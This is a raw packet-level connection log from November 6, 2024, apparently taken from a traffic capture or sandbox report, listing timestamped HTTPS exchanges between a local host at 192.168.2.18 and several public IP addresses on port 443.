                                                                                                                                              Nov 6, 2024 16:56:06.376986980 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.377010107 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.377371073 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.377391100 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.377445936 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.377455950 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.377489090 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.377614975 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.377629995 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.377677917 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.377686024 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.377711058 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.377763033 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.377778053 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.377899885 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.377908945 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.413363934 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.413391113 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.413480043 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.413515091 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.413741112 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.413765907 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.413811922 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.413820982 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.413835049 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.413851976 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.413881063 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.413935900 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.413942099 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.453177929 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.489222050 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.489252090 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.489310980 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.489355087 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.489389896 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.489414930 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.489489079 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.489572048 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.489587069 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.489644051 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.489651918 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.489900112 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.489923000 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.489994049 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.490003109 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.490142107 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.490158081 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.490227938 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.490236044 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.490354061 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.490376949 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.490412951 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.490421057 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.490448952 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.490483046 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.490500927 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.490550995 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.490559101 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.490622044 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.490642071 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.490674019 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.490680933 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.490715027 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.490869045 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.490888119 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.490983009 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.490988970 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.491097927 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.491117001 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.491152048 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.491157055 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.491213083 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.491241932 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.491256952 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.491308928 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.491326094 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.491533995 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.491553068 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.491601944 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.491611004 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.491621017 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.491636038 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.491668940 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.491676092 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.491702080 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.491709948 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.491729975 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.491771936 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.492337942 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.492356062 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.492391109 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.492397070 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.509179115 CET44349884188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.509569883 CET49884443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.509594917 CET44349884188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.510663033 CET44349884188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.510756016 CET49884443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.511498928 CET49884443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.511579037 CET44349884188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.511805058 CET49884443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.559329987 CET44349884188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.565045118 CET49884443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.565064907 CET44349884188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.613055944 CET49884443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.661478996 CET44349885188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.661964893 CET49885443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.661993027 CET44349885188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.663069010 CET44349885188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.663149118 CET49885443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.663501978 CET49885443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.663573980 CET44349885188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.663698912 CET49885443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.663717985 CET44349885188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.674007893 CET44349886188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.674313068 CET49886443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.674326897 CET44349886188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.675373077 CET44349886188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.675457001 CET49886443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.676071882 CET49886443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.676099062 CET49886443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.676127911 CET44349886188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.676191092 CET49886443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.676199913 CET44349886188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.676220894 CET49886443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.676249027 CET49886443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.676867008 CET49889443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.676904917 CET44349889188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.677000046 CET49889443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.677279949 CET49889443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.677287102 CET44349889188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.709012032 CET49885443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.745225906 CET44349887188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.745584965 CET49887443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.745605946 CET44349887188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.746682882 CET44349887188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.746758938 CET49887443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.747163057 CET49887443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.747230053 CET44349887188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.747426987 CET49887443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.789040089 CET49887443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.789069891 CET44349887188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.835016012 CET49887443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.942615032 CET44349888188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.942949057 CET49888443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.942980051 CET44349888188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.944048882 CET44349888188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.944117069 CET49888443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.944538116 CET49888443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.944596052 CET44349888188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.944820881 CET49888443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.944828987 CET44349888188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.995014906 CET49888443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:07.219855070 CET44349885188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.219935894 CET44349885188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.220500946 CET49885443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:07.220985889 CET49885443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:07.221009016 CET44349885188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.272815943 CET44349887188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.272866964 CET44349887188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.272896051 CET44349887188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.272906065 CET49887443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:07.272932053 CET44349887188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.272974014 CET44349887188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.273003101 CET44349887188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.273020029 CET49887443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:07.273025990 CET44349887188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.273051977 CET49887443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:07.273170948 CET44349887188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.273196936 CET44349887188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.273241043 CET49887443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:07.273252010 CET44349887188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.273294926 CET49887443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:07.320483923 CET44349889188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.320816994 CET49889443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:07.320833921 CET44349889188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.321176052 CET44349889188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.321547985 CET49889443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:07.321623087 CET44349889188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.321728945 CET49889443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:07.367328882 CET44349889188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.390011072 CET44349887188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.390131950 CET44349887188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.390165091 CET44349887188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.390197039 CET44349887188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.390197039 CET49887443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:07.390224934 CET44349887188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.390265942 CET44349887188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.390278101 CET49887443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:07.390285969 CET44349887188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.390316963 CET49887443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:07.390973091 CET44349887188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.391006947 CET44349887188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.391040087 CET44349887188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.391040087 CET49887443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:07.391060114 CET44349887188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.391082048 CET49887443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:07.391150951 CET44349887188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.391413927 CET49887443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:07.391544104 CET49887443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:07.391561985 CET44349887188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.439308882 CET44349888188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.439366102 CET44349888188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.439399004 CET44349888188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.439433098 CET49888443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:07.439436913 CET44349888188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.439461946 CET44349888188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.439482927 CET49888443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:07.439515114 CET44349888188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.439562082 CET44349888188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.439604044 CET49888443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:07.439615011 CET44349888188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.439665079 CET49888443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:07.439825058 CET44349888188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.439889908 CET44349888188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.439935923 CET49888443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:07.440742970 CET49888443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:07.440772057 CET44349888188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.729006052 CET44349889188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.729068995 CET44349889188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.729105949 CET44349889188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.729130030 CET49889443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:07.729135990 CET44349889188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.729170084 CET44349889188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.729193926 CET49889443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:07.730034113 CET44349889188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.730062962 CET44349889188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.730087996 CET49889443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:07.730101109 CET44349889188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.730127096 CET44349889188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.730153084 CET49889443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:07.730159998 CET44349889188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.730196953 CET49889443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:07.847568989 CET44349889188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.853339911 CET44349889188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.853385925 CET44349889188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.853406906 CET44349889188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.853425980 CET49889443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:07.853456020 CET44349889188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.853473902 CET49889443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:07.853585005 CET44349889188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.853635073 CET49889443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:07.853837967 CET49889443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:07.853853941 CET44349889188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.954801083 CET44349802104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.954894066 CET44349802104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.954968929 CET49802443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:56:07.980812073 CET44349803104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.980892897 CET44349803104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:07.981143951 CET49803443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:56:08.921803951 CET49802443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:56:08.921847105 CET44349802104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:08.921885014 CET49803443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:56:08.921890974 CET44349803104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:10.294681072 CET49891443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:10.294718981 CET4434989113.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:10.295778990 CET49891443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:10.295779943 CET49891443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:10.295808077 CET4434989113.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:10.436299086 CET44349884188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:10.436398029 CET44349884188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:10.436469078 CET49884443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:10.437578917 CET49884443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:10.437592030 CET44349884188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:10.990333080 CET49698443192.168.2.1820.190.159.0
                                                                                                                                              Nov 6, 2024 16:56:10.990803003 CET49892443192.168.2.1820.190.159.0
                                                                                                                                              Nov 6, 2024 16:56:10.990854025 CET4434989220.190.159.0192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:10.990971088 CET49892443192.168.2.1820.190.159.0
                                                                                                                                              Nov 6, 2024 16:56:10.991118908 CET49892443192.168.2.1820.190.159.0
                                                                                                                                              Nov 6, 2024 16:56:10.991133928 CET4434989220.190.159.0192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:10.995805979 CET4434969820.190.159.0192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:10.995912075 CET49698443192.168.2.1820.190.159.0
                                                                                                                                              Nov 6, 2024 16:56:11.019026041 CET4434989113.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:11.019790888 CET49891443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:11.019804001 CET4434989113.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:11.021096945 CET49891443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:11.021102905 CET4434989113.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:11.160703897 CET4434989113.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:11.160727024 CET4434989113.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:11.160799026 CET4434989113.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:11.160969973 CET49891443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:11.160969973 CET49891443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:11.161137104 CET49891443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:11.161137104 CET49891443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:11.161154032 CET4434989113.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:11.161164045 CET4434989113.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:12.080008030 CET4434989220.190.159.0192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:12.080082893 CET49892443192.168.2.1820.190.159.0
                                                                                                                                              Nov 6, 2024 16:56:12.094784021 CET49892443192.168.2.1820.190.159.0
                                                                                                                                              Nov 6, 2024 16:56:12.094825029 CET4434989220.190.159.0192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:12.095186949 CET4434989220.190.159.0192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:12.095680952 CET49892443192.168.2.1820.190.159.0
                                                                                                                                              Nov 6, 2024 16:56:12.095680952 CET49892443192.168.2.1820.190.159.0
                                                                                                                                              Nov 6, 2024 16:56:12.095712900 CET4434989220.190.159.0192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:12.463017941 CET4434989220.190.159.0192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:12.463044882 CET4434989220.190.159.0192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:12.463087082 CET4434989220.190.159.0192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:12.463120937 CET49892443192.168.2.1820.190.159.0
                                                                                                                                              Nov 6, 2024 16:56:12.463135958 CET4434989220.190.159.0192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:12.463160992 CET49892443192.168.2.1820.190.159.0
                                                                                                                                              Nov 6, 2024 16:56:12.463437080 CET49892443192.168.2.1820.190.159.0
                                                                                                                                              Nov 6, 2024 16:56:12.463455915 CET49892443192.168.2.1820.190.159.0
                                                                                                                                              Nov 6, 2024 16:56:12.463588953 CET4434989220.190.159.0192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:12.463623047 CET4434989220.190.159.0192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:12.463663101 CET49892443192.168.2.1820.190.159.0
                                                                                                                                              Nov 6, 2024 16:56:12.553925991 CET49893443192.168.2.182.23.209.141
                                                                                                                                              Nov 6, 2024 16:56:12.553966999 CET443498932.23.209.141192.168.2.18
